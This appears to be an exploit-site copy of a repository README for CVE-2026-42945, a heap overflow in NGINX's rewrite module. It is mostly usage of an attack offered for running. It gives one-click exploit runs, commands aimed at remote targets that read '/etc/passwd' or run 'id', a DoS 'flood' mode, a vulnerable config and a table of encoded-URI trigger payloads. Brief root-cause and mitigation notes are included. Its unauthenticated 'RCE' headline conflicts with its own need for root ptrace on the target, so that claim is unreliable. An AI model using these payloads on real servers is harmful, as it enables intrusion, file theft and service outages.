Share
## https://sploitus.com/exploit?id=249FFDA3-A061-5AA5-90A9-00C4EA088C4C
# CVE-2026-42945 โ€” NGINX Rewrite Module Heap Buffer Overflow โ†’ RCE  
> **RCE successfully exploited** โ€” Arbitrary commands can be executed in the NGINX/OpenResty worker process through a heap overflow attack + GDB process injection.  
## Quick start  
```bash
# Build the NGINX image with one click + perform RCE testing  
./run.sh nginx  
# Build the OpenResty image with one click + perform RCE testing  
./run.sh openresty  
# Custom commands  
./run.sh nginx 'cat /etc/passwd'  
./run.sh openresty 'whoami'  
```  
## Vulnerability overview  
| Attribute | Value |
|-----------|--------|
| CVE ID | CVE-2026-42945 |
| Vulnerability type | Heap buffer overflow โ†’ Remote code execution (RCE) |
| Affected component | `ngx_http_rewrite_module` |
| Affected versions | NGINX 0.6.27 ~ 1.30.1, NGINX Plus R32 ~ R36 |
| Vulnerability score | CVSS 9.4 (CRITICAL) |
| Exploitation conditions | No authentication required; RCE requires ptrace permission (root) |
## Root cause of the vulnerability  
The `ngx_http_script_complex_value_code()` function allocates buffers based on the **decoded length** of URIs. However, the `ngx_http_script_copy_capture_code()` function uses `ngx_escape_uri()`, which writes data based on the **encoded length**. URL-encoded characters are expanded by 3 times โ†’ **heap overflow**.  
### Triggering conditions  
All three conditions must be met simultaneously:  
1. The `rewrite` and `set` directives are in **the same location**.  
2. The `rewrite` replacement string contains `?`.  
3. The `set` directive references the **capture variable `$1` from the rewrite directive**.  
```nginx
location ~ ^/api/(.*)$ {  
    rewrite ^/api/(.*)$ /internal?migrated=true;  # Contains '?'
    set $original_endpoint $1;                     # References $1
}  
```  
### ASAN stack trace  
```
#0 ngx_escape_uri                    src/core/ngx_string.c:1663  
#1 ngx_http_script_copy_capture_code src/http/ngx_http_script.c:1399  
#2 ngx_http_rewrite_handler          src/http/modules/ngx_http_rewrite_module.c:180  
```  
## Project structure  
```
. โ”œโ”€โ”€ run.sh                          # One-click build + testing entry  
โ”‚   โ”œโ”€โ”€ README.md                   โ”‚
โ”œโ”€โ”€ scripts/                        โ”‚  # Testing & exploitation scripts  
โ”‚   โ”œโ”€โ”€ rce.sh                   โ”‚  # Pure Shell-based RCE (curl + GDB, no Python)  
โ”‚   โ”œโ”€โ”€ exploit_rce.py             โ”‚  # Python-based RCE (compatible with 2.7/3.x)  
โ”‚   โ”œโ”€โ”€ exploit.py                 โ”‚  # PoC main script (check/exploit/rce/flood)  
โ”‚   โ””โ”€โ”€ exploit_asan.py             โ”‚  # ASAN comprehensive scan  
โ”‚   โ”œโ”€โ”€ package/                   โ”‚  # Deployment & orchestration files  
โ”‚   โ”œโ”€โ”€ Dockerfile.rce            โ”‚  # NGINX source code compilation + RCE environment  
โ”‚   โ”œโ”€โ”€ Dockerfile.openresty.rce  โ”‚  # OpenResty source code compilation + RCE environment  
โ”‚   โ”œโ”€โ”€ Dockerfile               โ”‚  # Base image (Alpine)  
โ”‚   โ”œโ”€โ”€ Dockerfile.asan           โ”‚  # ASAN debugging image  
โ”‚   โ”œโ”€โ”€ docker-compose.yml         โ”‚  # Docker orchestration (nginx-rce + openresty-rce)  
```

โ”‚   โ”œโ”€โ”€ nginx.conf                  # NGINX vulnerability configuration
โ”‚   โ”œโ”€โ”€ nginx-openresty.conf        # OpenResty vulnerability configuration
โ”‚   โ”œโ”€โ”€ start_rce.sh                # NGINX RCE container startup script
โ”‚   โ””โ”€โ”€ start_openresty_rce.sh      # OpenResty RCE container startup script
โ”‚
โ””โ”€โ”€ src/                            # Source code (for compilation)
    โ”œโ”€โ”€ nginx-1.26.3/               # NGINX 1.26.3 source code
    โ”œโ”€โ”€ nginx-1.26.3.tar.gz
    โ””โ”€โ”€ openresty-1.25.3.1.tar.gz   # OpenResty 1.25.3.1 (with nginx/1.25.3 built-in)
```

## Detailed Usage

### Testing within the Docker container

```bash
# Shell script (no Python dependencies required)
docker exec nginx-rce bash /opt/rce.sh 'id'
docker exec nginx-rce bash /opt/rce.sh 'cat /etc/passwd'

# Python script (compatible with 2.7/3.x)
docker exec nginx-rce python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'whoami'

# Same for OpenResty
docker exec openresty-rce bash /opt/rce.sh 'id'
```

### Entering the container from the host machine

```bash
docker exec -it nginx-rce bash
# Inside the container:
bash /opt/rce.sh 'id'
python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'uname -a'
```

### Testing remote targets directly

```bash
# Requires root and ptrace privileges
sudo python3 scripts/exploit_rce.py -t http://target:80 -c 'id'
```

### Main exploitation script (four modes)

```bash
python3 scripts/exploit.py --target http://localhost:8775 --mode check     # Detect vulnerabilities
python3 scripts/exploit.py --target http://localhost:8775 --mode exploit   # ASAN heap overflow verification
python3 scripts/exploit.py --target http://localhost:8775 --mode rce       # RCE risk assessment
python3 scripts/exploit.py --target http://localhost:8775 --mode flood     # DoS stress test
```

## Triggering the payload

| Payload | Description | Result |
|---------|--------------|-------|
| `/api/%25` ร— N | Encoded `%` | โœ… Heap overflow |
| `/api/%3f` ร— N | Encoded `?` | โœ… Heap overflow |
| `/api/%23` ร— N | Encoded `#` | โœ… Heap overflow |
| `/api/%26` ร— N | Encoded `&` | โœ… Heap overflow |

## Fix suggestions

1. **Upgrade NGINX** to version 1.30.2+
2. **Temporary mitigation**: Avoid using combinations of `rewrite` (including `?`) and `set` (referring to `$1`)
3. **WAF rules**: Intercept requests containing numerous `%25`, `%3f`, `%23`, and `%26` encodings
4. **Permission reinforcement**: Use `echo 1 > /proc/sys/kernel/yama/ptrace_scope`

## References

- [F5 Advisory K000161019](https://my.f5.com/manage/s/article/K000161019)
- [NGINX Source Code](https://nginx.org/en/download.html)